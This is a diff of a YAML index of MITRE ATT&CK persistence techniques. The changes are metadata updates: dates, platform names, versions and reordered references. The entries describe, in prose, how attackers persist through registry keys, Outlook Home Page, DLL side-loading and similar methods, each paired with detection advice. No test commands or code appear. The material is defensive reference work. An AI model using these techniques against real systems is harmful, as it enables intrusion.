         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -34122,12 +34531,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -34205,41 +34613,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -34248,27 +34626,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -34329,7 +34734,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -34373,7 +34777,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -34395,7 +34799,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -34476,7 +34879,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -34499,7 +34901,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -34529,12 +34931,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -34624,12 +35024,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34714,7 +35113,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -34779,18 +35177,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34823,10 +35220,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -34863,7 +35259,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -34937,7 +35332,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34965,12 +35360,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -35029,33 +35423,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -35076,6 +35447,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -35090,52 +35462,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -35157,6 +35519,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -35167,23 +35530,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -35200,7 +35590,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -35259,7 +35649,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -35341,7 +35730,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1543.002:
@@ -35456,12 +35844,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35484,16 +35871,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -35520,7 +35906,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -35589,7 +35974,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -35625,7 +36009,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35644,12 +36028,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35699,12 +36082,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35737,9 +36119,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -35756,9 +36139,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -35804,12 +36186,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35823,7 +36204,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35882,7 +36263,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -35908,7 +36288,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -35934,13 +36314,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35964,8 +36342,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -35995,7 +36373,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -36038,7 +36415,7 @@ persistence:
